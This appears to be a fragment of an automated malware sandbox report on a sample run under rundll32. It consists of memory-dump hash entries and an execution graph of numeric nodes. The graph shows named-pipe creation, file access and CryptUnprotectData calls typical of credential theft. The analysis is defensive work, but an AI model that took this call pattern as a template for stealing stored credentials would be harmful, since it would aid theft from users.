                                                                • Opcode ID: 4c9fa10d4c9bdaeabed3ac2c4260b7c4600128ca19a1b42d36c27d95538cb2d8
                                                                • Instruction ID: 75128f426d96dcca34d863d614111457ec888cc017e14bc71a7a75858106c49b
                                                                • Opcode Fuzzy Hash: 4c9fa10d4c9bdaeabed3ac2c4260b7c4600128ca19a1b42d36c27d95538cb2d8
                                                                • Instruction Fuzzy Hash: 7C01696100E3D09FE7528B258C94762BFA8DF53224F0D84CBE8888F1A3C2689C45CB72
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c21ca9d0a60db6f8a368e8ecf441d271983ae7cdf44d01c490fa42364841cef0
                                                                • Instruction ID: 68acdc0f9cfbb6b5bd56e84df7296867c105a94033f7b716054aca9baa3dce90
                                                                • Opcode Fuzzy Hash: c21ca9d0a60db6f8a368e8ecf441d271983ae7cdf44d01c490fa42364841cef0
                                                                • Instruction Fuzzy Hash: F901A23170021897EB18EA6AC4657AF7AE7EFC9304F24807DD106B7390CE79AD058BD1
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2161191493.000000000302D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0302D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_302d000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d6702017cea31e14e3b35a25ac2395d70bca667397dbee26563ddbbe302ff576
                                                                • Instruction ID: 5c5b5d1cc053213053ef171d70250edc232bb003ae6dafafd5d07676537a4e46
                                                                • Opcode Fuzzy Hash: d6702017cea31e14e3b35a25ac2395d70bca667397dbee26563ddbbe302ff576
                                                                • Instruction Fuzzy Hash: 6301F23100A354EAE7508F25C9C4B66FFD8EF82364F0CC45AED684A292C678DC45CBB1
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ee9e9ca63a530e792b1824c7f097d5c2efd33edbeb82a5cf6ed68f7d82aa818e
                                                                • Instruction ID: 06706e8c6a05fff0b4d9b14a601464ff508bdb0266b6de1bb4a2372d9cec1d32
                                                                • Opcode Fuzzy Hash: ee9e9ca63a530e792b1824c7f097d5c2efd33edbeb82a5cf6ed68f7d82aa818e
                                                                • Instruction Fuzzy Hash: 0A01F430A063455FD7095FB578B911E3FE9EDC220130508BBD64ACF291EA28680D83F1
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e3cb003e80b92b898c6458706d9d356ce7df1d02ca51341c297f6a8164260dd4
                                                                • Instruction ID: 40acf82f07f05d4eb89fc6a9554b4cb7e5b81cc7614cd60fd56e5c877ee07678
                                                                • Opcode Fuzzy Hash: e3cb003e80b92b898c6458706d9d356ce7df1d02ca51341c297f6a8164260dd4
                                                                • Instruction Fuzzy Hash: 01F0BB74A012055FD7185FB5757955E3BEAEEC1351305083ED50ACF250EA35A80887E1
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ad3d5e89fbc6f9ac1d91741180058bee4cc0e7e1b925adcdbb0d1a52cd7dbc1a
                                                                • Instruction ID: d4a381490cd6ae9072f2acbfad469db217a5474affe847f5b6dbcef9c1fd6b0d
                                                                • Opcode Fuzzy Hash: ad3d5e89fbc6f9ac1d91741180058bee4cc0e7e1b925adcdbb0d1a52cd7dbc1a
                                                                • Instruction Fuzzy Hash: 0BF08231300204479322BA6EE89599BBBDEEBC5661300C52EF509DB304DFA5BC0187E0
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4961c86a79960348e42c100636d76cfeafa1f517e75444714e0f5478966358f6
                                                                • Instruction ID: 4e84d584930a8f579dde84142afc563b311ff800f492025310f8cc06b79ac6d7
                                                                • Opcode Fuzzy Hash: 4961c86a79960348e42c100636d76cfeafa1f517e75444714e0f5478966358f6
                                                                • Instruction Fuzzy Hash: 2CF05C357053485FC3059A29E85064BBF6EDBCB364F5000FAE348CB266CD75AC02C790
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 28bb16c1919345f34adbd621496e0cf5bc289168738174d1f0882bdcd8da7be5
                                                                • Instruction ID: 8ba0fd6f65c18af6e3635c9795932bc1539d80a232461061e5cfec6c2b8d0554
                                                                • Opcode Fuzzy Hash: 28bb16c1919345f34adbd621496e0cf5bc289168738174d1f0882bdcd8da7be5
                                                                • Instruction Fuzzy Hash: 38F0E5307146540BFB2816669C0039A6B899FE67A8F4000FBF485DBA93E4C0F84613B2
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 74009f4ce22f77444633f1b56a587e0d1a5d8cc98a75cdf94f6eac5653d19d98
                                                                • Instruction ID: c7b8f74326cc65eb4a7d1cebed9031d163c11bb961fa8e5c1d58e5a67d7b7132
                                                                • Opcode Fuzzy Hash: 74009f4ce22f77444633f1b56a587e0d1a5d8cc98a75cdf94f6eac5653d19d98
                                                                • Instruction Fuzzy Hash: 5BE0C2BF7491441FE721648E7891896AF28E2D21F930600BBF208CB102A452580392B4
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 54cc7dba33bade0fc2ec38fd84337336597cdb21e0b644d9a1388c4398d75df1
                                                                • Instruction ID: 2b5bd1e70424c60b90007af89b55822f891cd640cb7fdbcf09679cb0407691a8
                                                                • Opcode Fuzzy Hash: 54cc7dba33bade0fc2ec38fd84337336597cdb21e0b644d9a1388c4398d75df1
                                                                • Instruction Fuzzy Hash: CFE026367012084BC314A92AE84095BB79EEBC9228B1040B9E10CCB315CD76AC028A90
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6d6573c458f77d1f492b7407baf9daf618c20b692a87e583c3ce954a13acd5db
                                                                • Instruction ID: 365a7a28a1c4d63518e38bcbb5a9cba48fce0920b4b53a51d941da81998dae2e
                                                                • Opcode Fuzzy Hash: 6d6573c458f77d1f492b7407baf9daf618c20b692a87e583c3ce954a13acd5db
                                                                • Instruction Fuzzy Hash: BEE0927090524CEFDF01DB75E92118E7FB5DB86105B1048EAD444E7102EB30BE04D7A0
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1b513de989f9b39d9cbe2a05db1551211d4adf827b32ba1af8f8976bcc89f6d4
                                                                • Instruction ID: 4ae1c1f2b192ab0e0ba3c8bddbca7cbedd01fe3bd3248df02e641c86456ab078
                                                                • Opcode Fuzzy Hash: 1b513de989f9b39d9cbe2a05db1551211d4adf827b32ba1af8f8976bcc89f6d4
                                                                • Instruction Fuzzy Hash: 74D05E32A413149BEB1026AA14042EABBDCDF9A165F1544F7EE099B212A935AC0242F4
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8534f767ed2c8bfa49003aab474bfc287ac588dc4606338bf2ab833a6a09bd41
                                                                • Instruction ID: 1f4d5f35eaee41bbc47b245267d1640667dc024cabcb0ef050c8e9571f57f34f
                                                                • Opcode Fuzzy Hash: 8534f767ed2c8bfa49003aab474bfc287ac588dc4606338bf2ab833a6a09bd41
                                                                • Instruction Fuzzy Hash: 92D02B3231E2085FC3069754E4068697FB8AB56120304006BF805CF262CD602C80C7D0
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b2c8d21e3ada7ff31571517ace6c7ad3ee932cbe8fb4104acbb803a1018daebf
                                                                • Instruction ID: 4a76b6bf526e34ac525597013f2567d53fc41aed1990528e3c27d1f83085e319
                                                                • Opcode Fuzzy Hash: b2c8d21e3ada7ff31571517ace6c7ad3ee932cbe8fb4104acbb803a1018daebf
                                                                • Instruction Fuzzy Hash: E0E0867090B249EFDB01DFB4E9615DDBFB4DB46204B1045EAD408DB243E9345F069751
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 59f8832a341452443dbc54de9ea3975a84738c36143b87736f1ac91241044061
                                                                • Instruction ID: cf6880b97661851669d849873a70791cc9c19882b29cdad4f845c7f962fb8c76
                                                                • Opcode Fuzzy Hash: 59f8832a341452443dbc54de9ea3975a84738c36143b87736f1ac91241044061
                                                                • Instruction Fuzzy Hash: 77D0A73732511CAB52006619D85696E7BE9EBD53653104427FA0187210DD60BC419795
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9cc13f8c50ceaca79b326e4f316c86f4e9db4d862f210c331e8a1366915e3744
                                                                • Instruction ID: c09068cfeba8663d659a5c9da3c830adad3586bf21c478913491339fad1be6d5
                                                                • Opcode Fuzzy Hash: 9cc13f8c50ceaca79b326e4f316c86f4e9db4d862f210c331e8a1366915e3744
                                                                • Instruction Fuzzy Hash: 60D05EB0A0120CEFCB01EFB9E95559DBBFAEB49205B1089E9D408E7200EF316F009B90
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e11373d4686e01da05daa84cabcfcdc6a4b39590638cd056798ea1a225f2a81d
                                                                • Instruction ID: 2b9ac248039c2f209ab7eeaea1a8aa6b9e0cb0abf02431a469409e55dab179d8
                                                                • Opcode Fuzzy Hash: e11373d4686e01da05daa84cabcfcdc6a4b39590638cd056798ea1a225f2a81d
                                                                • Instruction Fuzzy Hash: F6D05B7090610EEFCB00DFF8E95159DBBB5DB45204F1046EDD408D7301EA316F009790
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000003.2160581676.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_3_4d40000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 869689b861b4d36a86ec7dbce9b230201363983a78961d50d7dd5468a7fa335c
                                                                • Instruction ID: fe7b829b9afd0a74e54e04fd53d9b9ace40c5c1c474879456a1267a71f3d334e
                                                                • Opcode Fuzzy Hash: 869689b861b4d36a86ec7dbce9b230201363983a78961d50d7dd5468a7fa335c
                                                                • Instruction Fuzzy Hash: DBC08CB67D5A002FEB018644AC866C9BB71EAB131834EC272E08182823C22D18138230

                                                                Execution Graph

                                                                Execution Coverage:14.4%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:2.9%
                                                                Total number of Nodes:442
                                                                Total number of Limit Nodes:28
                                                                execution_graph 51464 55b41d8 51465 55b422c ConnectNamedPipe 51464->51465 51466 55b4268 51465->51466 51467 55b2098 51468 55b20aa 51467->51468 51469 55b20ee 51468->51469 51471 55b2500 51468->51471 51472 55b253b 51471->51472 51473 55b2980 51472->51473 51476 13b7481 51472->51476 51480 13b7490 51472->51480 51477 13b74ba 51476->51477 51478 13b74d5 51477->51478 51484 13bf930 51477->51484 51478->51472 51481 13b74ba 51480->51481 51482 13b74d5 51481->51482 51483 13bf930 2 API calls 51481->51483 51482->51472 51483->51482 51485 13bf963 51484->51485 51487 13bf953 51484->51487 51485->51487 51493 13bf930 2 API calls 51485->51493 51496 13ba4b8 51485->51496 51501 13ba4c8 51485->51501 51506 3fe48b0 51485->51506 51512 3fe48a0 51485->51512 51518 13bfab8 51485->51518 51486 13bf95c 51486->51478 51487->51486 51488 3fe48b0 2 API calls 51487->51488 51489 3fe48a0 2 API calls 51487->51489 51488->51487 51489->51487 51493->51487 51497 13ba4f9 51496->51497 51498 13ba4ed 51496->51498 51497->51498 51499 3fe48b0 2 API calls 51497->51499 51500 3fe48a0 2 API calls 51497->51500 51498->51487 51499->51498 51500->51498 51502 13ba4f9 51501->51502 51503 13ba4ed 51501->51503 51502->51503 51504 3fe48b0 2 API calls 51502->51504 51505 3fe48a0 2 API calls 51502->51505 51503->51487 51504->51503 51505->51503 51508 3fe48e4 51506->51508 51509 3fe48d4 51506->51509 51507 3fe48dd 51507->51487 51511 13bf930 2 API calls 51508->51511 51509->51507 51526 3fe66f0 51509->51526 51511->51509 51514 3fe48e4 51512->51514 51515 3fe48d4 51512->51515 51513 3fe48dd 51513->51487 51516 13bf930 2 API calls 51514->51516 51515->51513 51517 3fe66f0 2 API calls 51515->51517 51516->51515 51517->51513 51519 13bfaeb 51518->51519 51520 13bfadb 51518->51520 51524 13bfab8 2 API calls 51519->51524 51525 13bf930 2 API calls 51519->51525 51522 13bfae4 51520->51522 51565 3fe001f 51520->51565 51570 3fe0040 51520->51570 51522->51487 51524->51520 51525->51520 51527 3fe6730 51526->51527 51530 3fe0510 51527->51530 51529 3fe674b 51529->51507 51531 3fe0536 51530->51531 51534 55b15f8 51530->51534 51538 55b1543 51530->51538 51531->51529 51535 55b160a 51534->51535 51542 55b1638 51535->51542 51536 55b162d 51536->51531 51539 55b1555 51538->51539 51541 55b1638 2 API calls 51539->51541 51540 55b162d 51540->51531 51541->51540 51543 55b1660 51542->51543 51547 55b1868 51543->51547 51556 55b1857 51543->51556 51544 55b16a0 51544->51536 51548 55b188f 51547->51548 51549 55b197a CreateNamedPipeW 51548->51549 51550 55b1910 51548->51550 51553 55b1a41 51549->51553 51554 55b1868 CreateNamedPipeW 51550->51554 51555 55b1857 CreateNamedPipeW 51550->51555 51551 55b1970 51551->51544 51553->51544 51554->51551 51555->51551 51557 55b1868 51556->51557 51558 55b197a CreateNamedPipeW 51557->51558 51559 55b1910 51557->51559 51562 55b1a41 51558->51562 51563 55b1868 CreateNamedPipeW 51559->51563 51564 55b1857 CreateNamedPipeW 51559->51564 51560 55b1970 51560->51544 51562->51544 51563->51560 51564->51560 51566 3fe005f 51565->51566 51569 3fe0510 2 API calls 51566->51569 51575 3fe0502 51566->51575 51567 3fe00d1 51567->51522 51569->51567 51571 3fe005f 51570->51571 51573 3fe0502 2 API calls 51571->51573 51574 3fe0510 2 API calls 51571->51574 51572 3fe00d1 51572->51522 51573->51572 51574->51572 51576 3fe0536 51575->51576 51577 55b15f8 2 API calls 51575->51577 51578 55b1543 2 API calls 51575->51578 51576->51567 51577->51576 51578->51576 51640 55b5d68 51641 55b5daa 51640->51641 51642 55b5db0 WaitNamedPipeW 51640->51642 51641->51642 51643 55b5de4 51642->51643 51620 3fe5f28 51621 3fe5f4c 51620->51621 51623 3fe5f5c 51620->51623 51622 3fe5f55 51621->51622 51626 3fe64fd 2 API calls 51621->51626 51627 3fe6558 2 API calls 51621->51627 51628 3fe64fd 51623->51628 51634 3fe6558 51623->51634 51626->51621 51627->51621 51629 3fe653d 51628->51629 51631 3fe657b 51629->51631 51632 13bf930 2 API calls 51629->51632 51630 3fe6584 51630->51621 51631->51630 51633 13bf930 2 API calls 51631->51633 51632->51631 51633->51631 51635 3fe657b 51634->51635 51636 3fe658b 51634->51636 51637 3fe6584 51635->51637 51639 13bf930 2 API calls 51635->51639 51638 13bf930 2 API calls 51636->51638 51637->51621 51638->51635 51639->51635 51644 51b3721 51645 51b3730 51644->51645 51646 51b3740 51645->51646 51652 55beaa0 51645->51652 51659 55beae8 51645->51659 51665 55bf124 51645->51665 51671 51b3875 51645->51671 51681 51b37d0 51645->51681 51654 55bea54 51652->51654 51653 55bea3f 51654->51652 51654->51653 51691 55bfc0f 51654->51691 51697 55bfc20 51654->51697 51703 5bf01a2 51654->51703 51717 5bf01a0 51654->51717 51660 55beb22 51659->51660 51661 5bf01a2 3 API calls 51660->51661 51662 5bf01a0 3 API calls 51660->51662 51663 55bfc0f 2 API calls 51660->51663 51664 55bfc20 2 API calls 51660->51664 51661->51660 51662->51660 51663->51660 51664->51660 51666 55beb49 51665->51666 51667 5bf01a2 3 API calls 51666->51667 51668 5bf01a0 3 API calls 51666->51668 51669 55bfc0f 2 API calls 51666->51669 51670 55bfc20 2 API calls 51666->51670 51667->51666 51668->51666 51669->51666 51670->51666 51673 51b37e5 51671->51673 51672 51b3845 51672->51646 51673->51672 51803 55b0e44 51673->51803 51807 55b0bc1 51673->51807 51811 55b0968 51673->51811 51815 51b6468 51673->51815 51820 55b0957 51673->51820 51824 55b0b3e 51673->51824 51828 51b6459 51673->51828 51682 51b37da 51681->51682 51683 51b3845 51681->51683 51682->51683 51684 51b6459 5 API calls 51682->51684 51685 55b0b3e 2 API calls 51682->51685 51686 55b0957 2 API calls 51682->51686 51687 51b6468 5 API calls 51682->51687 51688 55b0968 2 API calls 51682->51688 51689 55b0bc1 2 API calls 51682->51689 51690 55b0e44 2 API calls 51682->51690 51683->51646 51684->51683 51685->51683 51686->51683 51687->51683 51688->51683 51689->51683 51690->51683 51692 55bfc55 51691->51692 51731 55bff30 51692->51731 51736 55bff1d 51692->51736 51741 55bff88 51692->51741 51693 55bfc66 51693->51654 51698 55bfc55 51697->51698 51700 55bff88 2 API calls 51698->51700 51701 55bff1d 2 API calls 51698->51701 51702 55bff30 2 API calls 51698->51702 51699 55bfc66 51699->51654 51700->51699 51701->51699 51702->51699 51704 5bf01e8 51703->51704 51705 5bf0232 51704->51705 51706 5bf0767 51704->51706 51709 5bf036e 51705->51709 51715 5bf01a2 3 API calls 51705->51715 51716 5bf01a0 3 API calls 51705->51716 51747 5bf07a8 51705->51747 51751 5bf0798 51705->51751 51707 5bf07cc 51706->51707 51759 51b74c8 51706->51759 51765 51b74a5 51706->51765 51707->51654 51708 5bf02be 51708->51709 51755 5bf0b51 51708->51755 51709->51654 51715->51708 51716->51708 51718 5bf01e8 51717->51718 51719 5bf0232 51718->51719 51720 5bf0767 51718->51720 51723 5bf036e 51719->51723 51727 5bf07a8 3 API calls 51719->51727 51728 5bf0798 3 API calls 51719->51728 51729 5bf01a2 3 API calls 51719->51729 51730 5bf01a0 3 API calls 51719->51730 51721 5bf07cc 51720->51721 51725 51b74c8 3 API calls 51720->51725 51726 51b74a5 3 API calls 51720->51726 51721->51654 51722 5bf02be 51722->51723 51724 5bf0b51 CryptUnprotectData 51722->51724 51723->51654 51724->51723 51725->51721 51726->51721 51727->51722 51728->51722 51729->51722 51730->51722 51732 55bff5e 51731->51732 51733 55bff41 51731->51733 51732->51693 51733->51732 51744 13bffb0 51733->51744 51734 55bffaa 51734->51693 51738 55bff1f 51736->51738 51737 55bff5e 51737->51693 51738->51737 51740 13bffb0 2 API calls 51738->51740 51739 55bffaa 51739->51693 51740->51739 51742 55bffaa 51741->51742 51743 13bffb0 2 API calls 51741->51743 51742->51693 51743->51742 51745 13beaa8 2 API calls 51744->51745 51746 13bffc0 51745->51746 51746->51734 51749 51b74c8 3 API calls 51747->51749 51750 51b74a5 3 API calls 51747->51750 51748 5bf07cc 51748->51708 51749->51748 51750->51748 51752 5bf07cc 51751->51752 51753 51b74c8 3 API calls 51751->51753 51754 51b74a5 3 API calls 51751->51754 51752->51708 51753->51752 51754->51752 51756 5bf0aee CryptUnprotectData 51755->51756 51758 5bf0b5e 51755->51758 51757 5bf0b1a 51756->51757 51757->51709 51761 51b74d5 51759->51761 51760 51b74e7 51760->51707 51761->51760 51771 5bf07e0 51761->51771 51781 5bf07d0 51761->51781 51762 51b756f 51762->51707 51767 51b74ab 51765->51767 51766 51b74e7 51766->51707 51767->51766 51769 5bf07e0 3 API calls 51767->51769 51770 5bf07d0 3 API calls 51767->51770 51768 51b756f 51768->51707 51769->51768 51770->51768 51772 5bf0805 51771->51772 51774 5bf08b9 51771->51774 51772->51774 51775 5bf07e0 3 API calls 51772->51775 51776 5bf07d0 3 API calls 51772->51776 51791 5bf09c0 51772->51791 51773 5bf0a84 51773->51762 51779 5bf0b51 CryptUnprotectData 51774->51779 51797 5bf0aa0 51774->51797 51800 5bf0a99 51774->51800 51775->51774 51776->51774 51779->51773 51782 5bf07e0 51781->51782 51783 5bf08b9 51782->51783 51785 5bf07e0 3 API calls 51782->51785 51786 5bf07d0 3 API calls 51782->51786 51787 5bf09c0 3 API calls 51782->51787 51788 5bf0a99 CryptUnprotectData 51783->51788 51789 5bf0b51 CryptUnprotectData 51783->51789 51790 5bf0aa0 CryptUnprotectData 51783->51790 51784 5bf0a84 51784->51762 51785->51783 51786->51783 51787->51783 51788->51784 51789->51784 51790->51784 51792 5bf09d5 51791->51792 51794 5bf0a99 CryptUnprotectData 51792->51794 51795 5bf0b51 CryptUnprotectData 51792->51795 51796 5bf0aa0 CryptUnprotectData 51792->51796 51793 5bf0a84 51793->51774 51794->51793 51795->51793 51796->51793 51798 5bf0aee CryptUnprotectData 51797->51798 51799 5bf0b1a 51798->51799 51799->51773 51801 5bf0aee CryptUnprotectData 51800->51801 51802 5bf0b1a 51801->51802 51802->51773 51804 55b09d8 51803->51804 51805 55b0a65 51804->51805 51806 3fe66f0 2 API calls 51804->51806 51806->51805 51808 55b09d8 51807->51808 51809 55b0a65 51808->51809 51810 3fe66f0 2 API calls 51808->51810 51810->51809 51812 55b099a 51811->51812 51813 55b0a65 51812->51813 51814 3fe66f0 2 API calls 51812->51814 51814->51813 51817 51b647b 51815->51817 51816 51b64c3 51816->51672 51817->51816 51833 51b6b91 51817->51833 51839 51b6ba0 51817->51839 51822 55b099a 51820->51822 51821 55b0a65 51822->51821 51823 3fe66f0 2 API calls 51822->51823 51823->51821 51825 55b09d8 51824->51825 51826 55b0a65 51825->51826 51827 3fe66f0 2 API calls 51825->51827 51827->51826 51829 51b6468 51828->51829 51830 51b64c3 51829->51830 51831 51b6b91 5 API calls 51829->51831 51832 51b6ba0 5 API calls 51829->51832 51830->51672 51831->51829 51832->51829 51834 51b6b9a 51833->51834 51836 51b6c04 51833->51836 51835 51b6bab 51834->51835 51843 51b7ca9 51834->51843 51852 51b7cb8 51834->51852 51835->51817 51836->51817 51840 51b7ca9 5 API calls 51839->51840 51841 51b6bab 51839->51841 51842 51b7cb8 5 API calls 51839->51842 51840->51841 51841->51817 51842->51841 51844 51b7c3b 51843->51844 51845 51b7cb2 51843->51845 51844->51835 51846 51b84a6 51845->51846 51847 51b7cf9 51845->51847 51860 51bac2a 51845->51860 51869 51ba9c6 51845->51869 51846->51847 51850 51bac2a 5 API calls 51846->51850 51851 51ba9c6 5 API calls 51846->51851 51847->51835 51850->51847 51851->51847 51854 51b7cf5 51852->51854 51853 51b84a6 51855 51b7cf9 51853->51855 51858 51bac2a 5 API calls 51853->51858 51859 51ba9c6 5 API calls 51853->51859 51854->51853 51854->51855 51856 51bac2a 5 API calls 51854->51856 51857 51ba9c6 5 API calls 51854->51857 51855->51835 51856->51853 51857->51853 51858->51855 51859->51855 51862 51baa99 51860->51862 51861 51bac59 51861->51846 51862->51861 51878 51bdbbf 51862->51878 51885 51be9e7 51862->51885 51890 51be0c0 51862->51890 51897 51be9de 51862->51897 51902 51be34f 51862->51902 51907 51be0af 51862->51907 51870 51ba9d0 51869->51870 51871 51bac59 51870->51871 51872 51bdbbf 5 API calls 51870->51872 51873 51be0af 5 API calls 51870->51873 51874 51be34f CreateFileA 51870->51874 51875 51be9de CreateFileA 51870->51875 51876 51be0c0 5 API calls 51870->51876 51877 51be9e7 CreateFileA 51870->51877 51871->51846 51872->51870 51873->51870 51874->51870 51875->51870 51876->51870 51877->51870 51879 51be0e0 51878->51879 51915 51bec41 51879->51915 51880 51beace 51880->51880 51881 51be147 51921 55b5ba0 51881->51921 51927 55b5b8f 51881->51927 51886 51be9f2 51885->51886 51888 55b5b8f CreateFileA 51886->51888 51889 55b5ba0 CreateFileA 51886->51889 51887 51beace 51887->51887 51888->51887 51889->51887 51891 51be0f1 51890->51891 51894 51bec41 4 API calls 51891->51894 51892 51beace 51892->51892 51893 51be147 51895 55b5b8f CreateFileA 51893->51895 51896 55b5ba0 CreateFileA 51893->51896 51894->51893 51895->51892 51896->51892 51898 51bea41 51897->51898 51900 55b5b8f CreateFileA 51898->51900 51901 55b5ba0 CreateFileA 51898->51901 51899 51beace 51899->51899 51900->51899 51901->51899 51903 51be35b 51902->51903 51905 55b5b8f CreateFileA 51903->51905 51906 55b5ba0 CreateFileA 51903->51906 51904 51beace 51904->51904 51905->51904 51906->51904 51908 51be0a9 51907->51908 51909 51be0ba 51907->51909 51908->51862 51912 51bec41 4 API calls 51909->51912 51910 51beace 51910->51910 51911 51be147 51913 55b5b8f CreateFileA 51911->51913 51914 55b5ba0 CreateFileA 51911->51914 51912->51911 51913->51910 51914->51910 51916 51bec74 51915->51916 51918 51becbc 51916->51918 51933 5bf5ef8 51916->51933 51941 5bf5f08 51916->51941 51917 51bed4c 51918->51881 51922 55b5bbe 51921->51922 51924 55b5bd7 51922->51924 51980 55b5cf1 51922->51980 51924->51880 51926 55b5cf1 CreateFileA 51926->51924 51928 55b5ba0 51927->51928 51930 55b5bd7 51928->51930 51931 55b5cf1 CreateFileA 51928->51931 51929 55b5c00 51932 55b5cf1 CreateFileA 51929->51932 51930->51880 51931->51929 51932->51930 51935 5bf5f3c 51933->51935 51936 5bf5f2c 51933->51936 51934 5bf5f35 51934->51917 51949 5bf6088 51935->51949 51956 5bf6078 51935->51956 51936->51934 51937 5bf6088 4 API calls 51936->51937 51938 5bf6078 4 API calls 51936->51938 51937->51936 51938->51936 51942 5bf5f2c 51941->51942 51943 5bf5f3c 51941->51943 51944 5bf5f35 51942->51944 51945 5bf6088 4 API calls 51942->51945 51946 5bf6078 4 API calls 51942->51946 51947 5bf6088 4 API calls 51943->51947 51948 5bf6078 4 API calls 51943->51948 51944->51917 51945->51942 51946->51942 51947->51942 51948->51942 51950 5bf60ad 51949->51950 51952 5bf60bd 51949->51952 51951 5bf60b6 51950->51951 51977 5bf4d60 